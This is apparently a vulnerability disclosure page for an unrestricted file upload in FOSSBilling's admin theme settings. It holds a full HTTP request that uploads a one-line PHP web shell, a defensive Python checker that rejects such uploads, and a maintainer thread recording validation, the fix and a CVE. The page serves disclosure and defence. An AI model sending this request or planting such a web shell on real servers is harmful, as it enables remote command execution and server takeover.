Remote Code Execution via File upload in fossbilling/fossbilling

Valid

Reported on

Jun 29th 2023


Description

The theme settings save handler accepts any uploaded file without filtering its name, type or content, so an arbitrary PHP file can be uploaded.

Proof of Concept

POST /admin/theme/huraga HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------382348652630811262464163010367
Content-Length: 8095
Origin: http://localhost
Referer: http://localhost/admin/theme/huraga
Cookie: XDEBUG_SESSION=XDEBUG_ECLIPSE; PHPSESSID=63tt4112tgk75t8kl9viq1hfl6

-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="CSRFToken"

fc49506212203e218932933eea6c6675
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="color_scheme"

green
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_page_header"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_company_logo"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_company_name"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_client_details"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_balance_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_dashboard"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_order"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_profile"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="top_menu_signout"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_show_logo"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_logo_url"

/
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_password_reset_link"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_signup_link"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="login_page_show_remember_me"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="show_breadcrumb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="hide_dashboard_breadcrumb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="require_login"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_enabled"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_size"

3
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_text"

## The showcase text is markdown enabled
So you can use features like ~~strike-through ~~

Additionally, you can use things like lists
 - List item 1
 - List item 2

What's that? You don't want to have a button / link?

Then just make it blank and FOSSBilling will automatically hide it!
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="shell.php"; filename="ahihi.php"
Content-type: application/x-php

<?php

system($_GET["cmd"]);

?>
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_button_title"

Showcase button title
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="showcase_button_url"

Showcase link URL
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_dashboard"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_order"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_support"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_services"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_invoices"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_emails"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_payments"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_news"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="side_menu_kb"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_enabled"

0
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_title"

Note title
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="sidebar_note_content"

Note content
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_description"

Members area
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_keywords"

members area
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_robots"

index, follow
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="meta_author"

FOSSBilling
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_to_top_enabled"

1
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_signature"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_title"

About us
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_1_page"

about-us
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_title"

Terms and conditions
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_2_page"

tos
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_enabled"

on
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_title"

Privacy policy
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_3_page"

privacy-policy
-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_4_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_4_page"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_5_title"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="footer_link_5_page"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="inject_javascript"


-----------------------------382348652630811262464163010367
Content-Disposition: form-data; name="save-current-setting-preset"


-----------------------------382348652630811262464163010367--
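As an added defender-side illustration (not FOSSBilling's own code), the following Python parses a multipart body shaped like the request above and lists the reasons a theme-settings handler should have rejected the file part. The extension allowlist, the PHP markers and the sample body are assumptions constructed for the example.

```python
# Added illustration: vet multipart file parts the way a theme-settings upload handler should.
from email import policy
from email.parser import BytesParser

# Assumed allowlist of static theme assets; byte markers that identify PHP source.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "svg", "ico", "css"}
PHP_MARKERS = (b"<?php", b"<?=")

def classify_upload(filename: str, content_type: str, data: bytes) -> list[str]:
    """Return every reason this file part must be rejected (empty list = acceptable)."""
    reasons = []
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""  # LAST extension: catches x.png.php
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension '{ext}' not in allowlist")
    if "php" in content_type.lower():
        reasons.append(f"declared content type '{content_type}' is server-side code")
    if any(m in data for m in PHP_MARKERS):
        reasons.append("body contains a PHP open tag")
    return reasons

def scan_multipart(content_type_header: str, body: bytes) -> dict[str, list[str]]:
    """Map each file part's filename to its rejection reasons; plain fields are skipped."""
    raw = f"Content-Type: {content_type_header}\r\n\r\n".encode() + body
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = {}
    for part in msg.iter_parts():
        name = part.get_filename()
        if name is None:  # ordinary form field such as color_scheme
            continue
        ctype = str(part.get("Content-Type", ""))
        findings[name] = classify_upload(name, ctype, part.get_payload(decode=True) or b"")
    return findings

# Constructed sample: a benign logo upload plus a PHP file part like the one in the report.
BOUNDARY = "---------------------------382348652630811262464163010367"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="color_scheme"', "", "green",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="logo"; filename="logo.png"',
    "Content-Type: image/png", "", "not-really-png-bytes",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="shell.php"; filename="ahihi.php"',
    "Content-type: application/x-php", "", "<?php echo 'marker'; ?>",
    "--" + BOUNDARY + "--", "",
]).encode()

def demo() -> dict[str, list[str]]:
    return scan_multipart(f'multipart/form-data; boundary="{BOUNDARY}"', SAMPLE_BODY)
```

On the sample, `demo()` accepts `logo.png` and reports three independent reasons to reject `ahihi.php`; in a real handler, a non-empty list means the request is refused before anything is written to disk.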

PoC Image

(image not available)

Impact

Remote Code Execution

Occurrences

We are processing your report and will contact the fossbilling team within 24 hours. 3 months ago
Nhien.IT modified the report
3 months ago
fossbilling/fossbilling maintainer has acknowledged this report 3 months ago
Belle Aerni
3 months ago

Maintainer


Your image isn't loading, and the impact / title claims remote code execution; however, it doesn't seem like you've actually indicated a way to execute the uploaded file?

Nhien.IT modified the report
3 months ago
Belle Aerni validated this vulnerability 3 months ago

Thanks!

Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Belle Aerni
3 months ago

Maintainer


The upload function is being completely removed in this pull request, which will resolve this: https://github.com/FOSSBilling/FOSSBilling/pull/1392

Belle Aerni marked this as fixed in 0.5.3 with commit 2ddb74 3 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Jul 1st 2023
Admin.php#L66 has been validated
Belle Aerni published this vulnerability 3 months ago